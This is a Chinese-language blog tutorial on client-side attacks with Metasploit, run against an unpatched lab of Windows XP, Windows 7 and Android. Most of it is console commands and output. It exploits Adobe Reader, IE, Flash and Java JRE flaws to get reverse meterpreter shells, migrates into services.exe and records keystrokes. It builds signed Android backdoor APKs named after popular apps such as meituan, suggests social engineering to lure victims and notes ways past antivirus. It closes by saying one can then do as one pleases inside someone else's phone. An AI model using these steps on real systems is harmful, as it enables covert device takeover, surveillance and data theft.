admin管理员组

文章数量:1567046

客户端渗透

漏洞

实战·漏洞利用·提权

需要用到的环境

VMware

kali Linux

win XP

win 7

前言

    现实的网络中,企业已经非常注重安全,攻击者也逐步从服务器攻击转向客户端攻击,比如:安卓渗透、软件后门、0day等等。那么,是怎么实现客户端攻击的呢?

    某些操作系统和软件应用,没有打上相应的补丁,存在较多的漏洞或是后门,可以通过漏洞或后门进行提权,达到完全控制的效果。

工具

Metasploit

//黑天黑地黑王母的渗透神器

Keytool、JARsigner、zipalign

//APK文件签名三件套

PDF漏洞

WIN7中实验不成功,需在xp上,关闭防火墙和杀毒软件。

实现使用reader 8.1.2 中的漏洞进行客户端的远程控制,该漏洞适用于xp系统,建议升级系统或是升级reader到最新版。

Win xp 上安装adobe reader 8.1.2 版本,不能打补丁

kali中启动msf

root@kali:~# msfconsole  > search adobe

> show options

> set payload windows/meterpreter/reverse_tcp> set lhost 192.168.187.128> exploit 

//把msf.pdf文件拷贝到靶机上。

//把msf.pdf文件拷贝到远程的windows10上,会被杀毒软件查杀,恢复,压缩共享到windows xp上:

在kali上启动侦听

msf5 exploit(multi/handler) > exploit -j //启动msf5 exploit(multi/handler) > jobs //本地启动4444端口,等待目标连接过来

当在windows xp上,双击msf.pdf文件,利用adobe漏洞,执行:

// msf.pdf是一个空的文件,xp连接到msf上

进程注入  

//如果目标主机xp,发现异常,把adobe的进程关闭,可以将adobe的进程迁移到系统进程中,避免被目标主机关闭进程.

meterpreter > ps

meterpreter > migrate -P 1036 -N services.exe

注入成功!

恶意网站

搭建xp环境,关闭防火墙和杀毒软件,不打补丁。

生成恶意的网站诱导用户点击,就能实现对客户端的完全控制。

此漏洞是利用ie浏览器中的已知漏洞。

建议更新系统或更新浏览器进行防范。

未知的链接不能乱点。

> use exploit/windows/browser/adobe_utilprintf> info

//存在该缓冲区溢出漏洞

> set SRVPORT 80> set payload windows/meterpreter/reverse_tcp> set lhost 192.168.187.128> set lport 4445> show options//随机生成url链接,目标查看这个网站容易产生警觉,可以设置:> set uripath /> exploit

//生成的url链接:

//在Xp上,使用ie浏览器打开此链接,在应用场景中,攻击者可使用社会工程学来诱导用户点击此链接。

提权:use priv run post/windows/capture/keylog_recorder //敲击键盘动作的记录====================================================================报错:[-] Exploit failed: Rex::RuntimeError The supplied resource '/' is already added. //80被占用jobsKill id=====================================================================思考???判断下方攻击载荷是什么利用漏洞:exploit/multi/browser/adobe_flash_hacking_team_uafexploit/multi/browser/adobe_flash_opaque_background_uafauxiliary/server/browser_autopwn2没错,就是flash的利用漏洞。

flash漏洞

搭建win7系统,关闭防火墙和杀毒软件,不打补丁。

Windows7中保证安装flash:

msf5 > use exploit/multi/browser/adobe_flash_hacking_team_uafmsf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set SRVPORT 80msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set uripath /msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set payloadwindows/meterpreter/reverse_tcpmsf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set lhost 192.168.1.115msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set lport 777msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > show targets //windows和linux平台上均存在,默认是选择windows,不需要修改

Windows7端访问:http://192.168.1.115:80/

报错:

msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > info //查看模板信息

查看该win7靶机的信息:

msf5 > use exploit/multi/browser/adobe_flash_opaque_background_uaf

msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) > set srvport 80msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) > set uripath /

客户端访问:

条件不匹配!!!

-----------------------------------------------------------------

msf5 > use auxiliary/server/browser_autopwn2msf5 auxiliary(server/browser_autopwn2) > set SRVPORT 80msf5 auxiliary(server/browser_autopwn2) > set uripath /#所有跟浏览器的漏洞利用代码全部打包起来,形成auxiliary,不需要指定payload

#挑选质量比较好的漏洞,一个个的尝试:

#支持安卓客户端

依次用windows7、安卓、xp、windows10、centos8访问

Windows7上访问地址:

//windows7上存在多个被利用的漏洞,利用成功

IE浏览器的漏洞执行payload:

/windows/browser的模块下,存在大量与浏览器相关的漏洞,可以逐个尝试。

use exploit/windows/browser/ms14_064_ole_code_executionmsf5 > use exploit/windows/browser/ms14_064_ole_code_execution //支持windows7和xpmsf5 exploit(windows/browser/ms14_064_ole_code_execution) > set SRVPORT 80msf5 exploit(windows/browser/ms14_064_ole_code_execution) > set uripath /uripath => /msf5 exploit(windows/browser/ms14_064_ole_code_execution) > set payloadwindows/meterpreter/reverse_tcpmsf5 exploit(windows/browser/ms14_064_ole_code_execution) > set lhost 192.168.1.115msf5 exploit(windows/browser/ms14_064_ole_code_execution) > exploit

客户端windows xp访问:

JRE漏洞

实验环境:

Kali linux:192.168.1.115

Windows xp:192.168.1.112 安装jre-7u10-i586版本

msf5 > use exploit/multi/browser/java_jre17_driver_managermsf5 exploit(multi/browser/java_jre17_driver_manager) > set srvport 80msf5 exploit(multi/browser/java_jre17_driver_manager) > set uripath /msf5 exploit(multi/browser/java_jre17_driver_manager) > set payload java/ //需要选择基于java的meterpreter的payload,不能选择基于windowsset payload java/jsp_shell_bind_tcp set payload java/meterpreter/reverse_tcpset payload java/jsp_shell_reverse_tcp set payload java/shell/bind_tcpset payload java/meterpreter/bind_tcp set payload java/shell/reverse_tcpset payload java/meterpreter/reverse_http set payload java/shell_reverse_tcpset payload java/meterpreter/reverse_httpsmsf5 exploit(multi/browser/java_jre17_driver_manager) > set payload java/meterpreter/reverse_tcpmsf5 exploit(multi/browser/java_jre17_driver_manager) > set lhost 192.168.1.115msf5 exploit(multi/browser/java_jre17_driver_manager) > exploit -j[*] Exploit running as background job 0.[*] Exploit completed, but no session was created.msf5 exploit(multi/browser/java_jre17_driver_manager) >[*] Started reverse TCP handler on 192.168.1.115:4444[*] Using URL: http://0.0.0.0:80/[*] Local IP: http://192.168.1.115:80/ //生成可浏览的网站,一旦在XP上浏览该网站,只要有安装有漏洞的jre程序,会被执行

靶机xp上,浏览器访问http://192.168.1.115

不要点击update,不然漏洞会被修补,选择later,才有实验效果

会话建立成功!攻击成功!

多次尝试以下载荷:use exploit/multi/browser/java_jre17_jmxbeanmsf5 > use exploit/multi/browser/java_jre17_jmxbeanmsf5 exploit(multi/browser/java_jre17_jmxbean) > set payload java/meterpreter/reverse_tcpmsf5 exploit(multi/browser/java_jre17_jmxbean) > set lhost 192.168.1.115msf5 exploit(multi/browser/java_jre17_jmxbean) > set uripath /msf5 exploit(multi/browser/java_jre17_jmxbean) > set srvhost 192.168.1.112msf5 exploit(multi/browser/java_jre17_jmxbean) > set lport 4446msf5 exploit(multi/browser/java_jre17_jmxbean) > set srvport 8080执行失败!use exploit/multi/browser/java_jre17_reflection_typesmsf5 > use exploit/multi/browser/java_jre17_reflection_typesmsf5 exploit(multi/browser/java_jre17_reflection_types) > set srvport 80msf5 exploit(multi/browser/java_jre17_reflection_types) > set uripath /msf5 exploit(multi/browser/java_jre17_reflection_types) > set payload java/meterpreter/reverse_tcpmsf5 exploit(multi/browser/java_jre17_reflection_types) > set lhost 192.168.1.115msf5 exploit(multi/browser/java_jre17_reflection_types) > exploit -j执行成功!

最后一个!安卓渗透!

生成Android后门程序:use payload/android/meterpreter/reverse_tcpgenerate -p android -o xxx.apk //生成a.apk文件,-p 平台生成payload,放入手机中执行:msf5 > use payload/android/meterpreter/reverse_tcpmsf5 payload(android/meterpreter/reverse_tcp) > set lhost 192.168.1.115msf5 payload(android/meterpreter/reverse_tcp) > generate -p android -o wandoujia.apkroot@kali:~# lswandoujia.apk放入windows中,杀毒软件不会检测apk文件,上传到安卓手机中安装: (需要连接数据线或蓝牙传输),在安卓手机上安装即可msf中监听:msf5 payload(android/meterpreter/reverse_tcp) > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcpmsf5 exploit(multi/handler) > set lhost 192.168.1.115msf5 exploit(multi/handler) > set lport 777

安卓手机上安装:会报错,解析包出问题

下面使用第二种方法:

msf5 > msfvenom --platform android -p android/meterpreter/reverse_tcp lhost=192.168.1.115 lport=9000-o meituan.apk //生成木马,蓝牙发送至手机,安装,生成一个appmsf5 > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcpmsf5 exploit(multi/handler) > set lport 9000msf5 exploit(multi/handler) > exploit -j

并点击生成的app执行,并可以wlan:

即使能进入meterprer也会出现会话关闭现象!

解决办法:制作签名

生成的这个apk不能直接在Android中直接运行,

因为这个apk需要一个签名才可以运行。

下面我们为这个apk生成一个签名。

创建签名需要使用Keytool、JARsigner、zipalign这3个软件。

Kali中内置了前2个,第3个需要安装。

第一步:

使用keytool生成一个key文件。会让你输入该key的名称、单位、地址等等信息,最终生成一个key文件。

root@kali:~# keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 1000

生成文件:my-release-key.Keystore

第二步:

使用该key文件配合JARsigner为APK签名

root@kali:~# apt-get install openjdk-13-jdk-headless  //安装签名工具root@kali:~# jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore meituan.apk alias_name

第三步:

使用JARsigner验证签名

root@kali:~# jarsigner -verify -verbose -certs meituan.apk

现在apk文件可以在任何安卓中使用,重新蓝牙发送到手机,并安装,显示如下图标:

执行报错:

解决:

点击安装的图标:

于是,就可以在别人手机里为所欲为了。

-END-

"TAKE LIFE SERIOUSLY "

每一个认真生活的人,都值得被认真对待。

本文标签: 客户端攻防步骤干净Server